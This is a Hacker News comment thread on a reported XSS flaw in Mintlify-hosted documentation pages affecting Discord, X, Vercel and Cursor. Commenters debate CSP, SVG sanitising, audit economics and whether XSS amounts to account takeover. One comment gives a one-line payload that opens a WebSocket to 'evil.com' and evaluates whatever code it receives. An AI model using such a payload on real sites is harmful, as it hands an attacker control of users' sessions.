We pwned X, Vercel, Cursor, and Discord through a supply-chain attack

Posted by hackermondev 5 days ago

We pwned X, Vercel, Cursor, and Discord through a supply-chain attack(gist.github.com)

1162 points | 434 commentspage 3

skrebbel 5 days ago|

at this point I feel like it'd be useful for web server default configurations to include something like

    if extension == .svg
       set-header Content-Security-Policy: script-src 'none'
    end

wouldn't that stop a browser from running scripts, even if the svg file is opened directly? having this be widespread would solve it wholesale.

vpShane 5 days ago|

Not a bad idea!

orliesaurus 5 days ago||

I've been following the rise of SVG based attacks recently... It's not just hypothetical anymore... People are using SVG files to deliver full phishing pages and drive by downloads by hiding JavaScript in the markup

ALSO as someone who maintains a file upload pipeline I run every SVG through a sanitizer... Tools like DOMPurify remove scripts and enforce a safe subset of the spec... I even go as far as rasterizing user uploaded vectors to PNG when possible

HOWEVER the bigger issue is mental... Most folks treat SVG like a dumb image when browsers treat it like executable content... Until the platform changes that expectation there will always be an attack surface

franga2000 2 days ago||

I really don't get the appeal to have everything om one top-level domain, especially completely separate or even external services. The scope of this would've been basically zero if they just put it on docs.discord.com.

Especially something like this, where they were reverse proxying a SaaS, seems extra stupid. It's more work to set up, adds an unnecessary dependency between services and you end up paying for all the internet traffic three times (even if not directly).

varenc 5 days ago||

This is a great example of why a Content-Security-Policy (CSP Header) should be considered mandatory for high risk sites. With it you can effectively tell the browser what JS is allowed to run, meaning that any JS injected via XSS won't work.

I suspect Coinbase and others already use CSP.

https://en.wikipedia.org/wiki/Content_Security_Policy

kizer 5 days ago||

Cool. Makes me want to get into that — checking out sites for vulnerabilities. Very impressive for a 16 year old. Should definitely have been paid more.

lrvick 5 days ago||

I run an infosec firm and we have done attacks like this on my clients over and over and over in audits. I always say any bored teen could do most of what we do because most companies are moving too fast feature farming to have any time for responsible security hardening, and now I have yet another great citation.

Unfortunately a competitive rate agreed to in advance with a company before we do any pentesting is the only way we have ever been able to get paid fairly for this sort of work. Finding bugs in the wild as this researcher did often gets wildly underpaid relative to the potential impact of the bug, if they pay or take it seriously at all.

These companies should be ashamed paying out so little for this, and it is only a matter of time before they insult the wrong researcher who decides to pursue paths to maximum profit, or maximum damage, with a vuln like this.

jijijijij 5 days ago||

> Unfortunately a competitive rate agreed to in advance with a company before we do any pentesting is the only way we have ever been able to get paid fairly for this sort of work.

So, rough estimate, how much would you have made for this?

lrvick 5 days ago||

We normally find things like this in our usual 60 hour audit blocks. Rates change over time with demand, but today an audit of that length would be $27k.

Even that is quite cheap compared to letting a blackhat find this.

lowkey_ 5 days ago||

If I can ask on business model, as I have a friend with a similar predicament — what percent of the time do you find vulnerabilities in those audits? Do companies push back if you don't find vulnerabilities?

lrvick 5 days ago|||

We have never issued a clean report in our ~5 years of operation.

Some firms have a reputation for issuing clean reports that look good to bosses and customers, but we prefer working with clients that want an honest assessment of attack surface and how motivated blackhats will end their business.

We also stick around on retainer for firms that want security engineering consulting after audits to close the gaps we find and re-architect as needed. Unused retainer hours go into producing a lot of open source software to accelerate fixing the problems we see most often. This really incentivizes us to produce comprehensive reports that take into account how the software is developed and used in the real world.

Under our published threat model few companies pass level one, and we have helped a couple get close to level 2 with post audit consulting.

Our industry has a very long way to go as current industry standard practices are wildly dangerous and make life easy for blackhats.

https://distrust.co/threatmodel.html

rainonmoon 5 days ago||||

As someone in a related line of work: we find vulnerabilities so close to 100% of the time that it might as well be 100% of the time. Whether they're practically exploitable or surpass your risk appetite is the real question.

TheDong 5 days ago|||

These companies almost always produce "vulnerabilities", but they're also almost always trash.

"Finding: This dependency is vulnerable to CVE-X, update it, severity S". And then of course that dependency is only used during development, the vulnerable code isn't called, and they didn't bother to dig into that.

"Finding: Server allows TLS version 1.1, while it's recommended to only support version 1.2+", yeah, sure, I'm sure that if someone has broken TLS 1.1, they're coming for me, not for the banks, google, governments, apple, etc, everyone else still using TLS 1.1

... So yeah, all the audits will have "findings", they'll mostly be total garbage, and they'll charge you for it. If you're competent, you aren't going to get an RCE or XSS out of a security audit since it simply will not be there.

lrvick 4 days ago||

At Distrust we do not comment on specific dependency CVEs unless they are likely exploitable, or there are a lot of them pointing at bigger problems in the overall approach to dependency management.

That said, a policy of blindly updating dependencies to patch irrelevant CVEs is itself, a very real security vulnerability, because pulling in millions of lines of code no one reviews from the internet regularly makes you an easy target for supply chain attacks.

We have pulled off supply chain attacks on our clients a few times who were not otherwise convinced they were a real threat.

hinkley 5 days ago||

It’s clear to me now that I need to set up my home machine the way I set up BYOD when I was contracting last. I need a separate account for all of my development.

I have a friend who at one point had five monitors and 2 computers (actually it might be 3) on his desk and maybe he’s the one doing it right. He keeps his personal stuff and his programming/work stuff completely separate.

combyn8tor 5 days ago||

I have three OS installs. Windows install for games. Another Windows for development (I have to for windows dev). And a Ubuntu install for anything not games/work. The windows drives use bitlocker and they can't access each other's files. It's not perfect.

Although with the amount of crap I have to install for windows development I'm starting to wonder if a base VM image that is used as a start point for each project would be cleaner.

myaccountonhn 4 days ago||

I set up a separate user that I ssh into for development. Not perfect but its something.

babelfish 5 days ago||

Sounds like you pwned Mintlify!

Aachen 4 days ago|

I critiqued the title elsewhere already so let me say here that the screenshot does show code running in Discord's browser context. They didn't send it to an employee and actually pwn the company, as one might understand from the title, but it doesn't strictly say that and I would count finding XSS as close enough. Saying they've pwned Discord, I think is fair enough

The other three companies mentioned though... yeah, they totally pwned the dependency first and foremost

JackSlateur 5 days ago||

I struggle to understand the issue .. could someone help me out ?

Ok, you got "https://discord.com/_mintlify/_static/hackerone-a00f3c6c/lma..." to send a controlled payload

But regular users will never hit "https://discord.com/_mintlify/_static/hackerone-a00f3c6c/lma...", so they will never execute your script

I fail to understand how this can be exploited, by whom and in what conditions

rainonmoon 5 days ago||

You're pretty much on the money. Reflected XSS requires social engineering to really target anyone without other primitives. Unfortunately this report is not very clear about the tangible impacts or limitations of what they could do with this particular XSS either. Saying that every Mintlify customer was "vulnerable to account takeover with a single malicious link" strikes me as specious to say the least. Still, can't fault kids for getting excited about recognition and a payout.

hackermondev 5 days ago||

imo, the impact is pretty clear here. an unsuspecting user clicks (or is redirected) to one of these malicious links on the platform (ex. vercel); the script grabs their cookie and credentials and sends it to the attacker. they now have full access to the victim's account.

rainonmoon 5 days ago|||

Nice! So the Cookie is accessible by JavaScript on all of those sites? That would be pretty surprising given the prevalence of HttpOnly, so that doesn't seem clear to me at all. And they're all using Cookie-based auth, you think? You're a bug bounty hunter so I'll defer to your wisdom, but doesn't it seem more likely that an account takeover would be possible via a state-changing request from the user's existing session? Let's say they can abuse it to reset the user's password. Nice, that's an account takeover... for every user not using MFA. But then there are anti-CSRF mitigations. Okay, not insurmountable with an XSS, but implemented differently everywhere. And what if the auth domains are separate to the domain on which the XSS is triggered? Man this seems to get less clear by the minute. Please clear this up for me.

llmslave2 5 days ago|||

XSS is a RCE exploit. It allows you to run any action as if you were the owner of the account. How is that not a full account takeover?

rainonmoon 5 days ago|||

XSS is categorically not an RCE and my point is that mitigations exist which make "It allows you to run any action as if you were the owner of the account" an unwarranted assumption. The writeup shows that it's possible to pop an alert box. That doesn't tell you anything about what's actually possible. Obviously Discord got enough information to take it seriously, but extrapolating that to suggest every third-party using Mintlify is vulnerable to account takeover is highly dubious based on what's presented.

llmslave2 5 days ago|||

How is XSS not remote code execution? You can do anything, from send fetch requests to the server with full credentials to loggging keystrokes or even open a tunnel and eval payloads...

Anything the user can do, you can do via an XSS attack.

rainonmoon 5 days ago|||

Show me where you can "open a tunnel" using the XSS in this post.

> Anything the user can do, you can do via an XSS attack.

I just explained why this isn't a reasonable assumption. You seem to have multiple fundamental misunderstandings about web application security so I don't think it's constructive for either of us to continue this conversation.

llmslave2 5 days ago||

> Show me where you can "open a tunnel" using the XSS in this post.

   new WebSocket("ws://evil.com").addEventListener("message", e => eval(e.data))

> You seem to have multiple fundamental misunderstandings about web application security

Lol yeah sure buddy

rainonmoon 5 days ago||

Go to Discord and paste that into your console. None of us will hold it against you if you come back and delete these comments once you learn about Content Security Policy.

zahlman 4 days ago|||

> Go to Discord and paste that into your console.

The same Discord that configures things so that any time you open the console it greets you with a giant message warning you not to paste anything into the console?

llmslave2 5 days ago|||

Maybe you should read up on what CSP can and can't do. Once an attacker can execute arbitrary code, they can do anything the client can.

collinmanderson 4 days ago|||

Generally code execution within browser/client-side javascript sandbox is just "XSS".

RCE usually implies server-side code execution (or breaking out of browser sandbox).

llmslave2 4 days ago||

Hmm, I've always thought of "RCE" in a more general way, regarding the ability to execute arbitrary code on a computer you don't own. For example some multiplayer games have had exploits that let hosts run arbitrary code on clients that connect to them, and I've seen that called an RCE vulnerability. shrugs

collinmanderson 3 days ago||

If it’s running code outside of a normal browser sandbox then, yes it’s a RCE. Because it can now access to nearly everything on the user’s computer, including their browser, email, etc.

XSS is limited to accessing just that one website.

rvnx 5 days ago|||

Well, llmslave2 is right. If discord.com executes javascript to conduct user actions, and you can execute javascript on discord.com, you are acting on the account as if you were discord.com

rainonmoon 5 days ago||

Except discord.com doesn't execute JavaScript, the user's browser does. These are meaningful distinctions that delineate the impact. You aren't "discord.com" if you target someone with an XSS exploit, you've only run a script in a user's session. Whether you can actually do anything with that script or not decides whether you can take over the account or not.

llmslave2 5 days ago|||

Everybody knows that XSS is a client side exploit, you're acting naive by pretending like we're claiming it gives access to a server and ignoring the fact that having control of the client gives you de facto control of whatever account is logged into the client.

rvnx 5 days ago||

It is not as cool as the RPC exploit of React/Next.js where you could call any function on the server-side including “vm.sysexec” or whatever it was, but still not to be fully ignored

rvnx 5 days ago|||

Yes, I agree, it’s a cool discovery though

collinmanderson 4 days ago|||

Yes, it's generally a "full account takeover" for a given discord user.

But RCE usually means ability to run any code on the web server, and would generally get you access to _everything_ including full direct access to the database. All accounts and all data, not just a few accounts.

hackermondev 5 days ago|||

the impact varied by customer. in Discord's case, the auth token is stored in local storage and their docs is hosted on the primary domain; they were susceptible to a full account takeover. X's docs are on a different subdomain but we found a CSRF attack that could facilitate a full account takeover. most companies were significantly affected in one way or another.

bangaladore 5 days ago|||

Interesting. I agree with the other commenter about the post should've included how an account takeover was possible.

You mention one method being a cookie sent to an attacker-controlled domain, but that in itself is a vulnerability given it being incorrectly scoped (missing HTTPOnly & SameSite atleast).

> the auth token is stored in local storage

Has anyone reported this (rhetorical question)? What in the world could be the justification for this?

In my opinion, any full account takeovers due to XSS is a vulnerability, even ignoring XSS. Changing email/password/phone should require verification back to one of those methods. Or at least input of the previous password.

rainonmoon 5 days ago|||

And to my earlier point, none of that is in the writeup here to support the enormous claims made in framing the finding. This is good work, and congratulations on the bounty. I hope you have a long career in security ahead. Obviously you communicated your findings to Discord clearly enough for them to understand the impact. I look forward to reading more research from you all in the future and I hope the technical details will accompany it.

wonnage 5 days ago|||

You could send that link to an unsuspecting user and steal their cookies, make API requests to send messages on their behalf, etc

Apparently one of the other linked posts shows how you can also gain RCE, since the docs are statically pre-rendered and there’s no sandboxing to prevent you from evalling arbitrary JavaScript.

Willish42 5 days ago||

> Apparently one of the other linked posts shows how you can also gain RCE

Yep, here it is: https://kibty.town/blog/mintlify/

Also linked in his guide (which I missed) and [here in a separate HN post](https://news.ycombinator.com/item?id=46317546). I think this other author's post is a lot more detailed and arguably more useful to folks reading on HN.

viraptor 5 days ago|||

It's hosted on the official domain. That means you have at least 2 options: a) chain in with another issue which allows to load that as a trusted resource, or b) scam people by directing them to an "official" post. Also you get discord cookies access.

jeffjeffbear 5 days ago|||

You have control over what displays on a page with a discord.com domain, you could manipulate the dom to have a login or something else and have it pass the data to your servers. A user would just see a link from discord.com

bangaladore 5 days ago||

Yeah, this one must be socially engineered-- but a (fake) login page when accessing a docs site would fool most people.

Thankfully the browser prevents sending the cookies cross origin or else this is just a single click exploit.

Edit: I gave too much credit to Discord here. They aren't protecting their tokens correctly.

rvnx 5 days ago||

You can also just be logged-in on Discord web, so everything is accessible too

bethekidyouwant 5 days ago||

if you click on the link because it has discord.com in the domain the script in the SVG can (maybe) get your session data. Not actually sure if that’s true though, I suppose it depends on how the cookies are scoped

isodev 4 days ago|

Btw, apart from Discord, you really should stop using the other ones (X, Vercel, Cursor...). Do yourself and the planet a favour :)

promiseofbeans 4 days ago|

Stop using Discord as well - their software is packed full of data mining, ads, and cosmetic upsells. For public community groups use a forum site (then it’s indexable as well!), and for private groups use something actually private like Signal

More comments...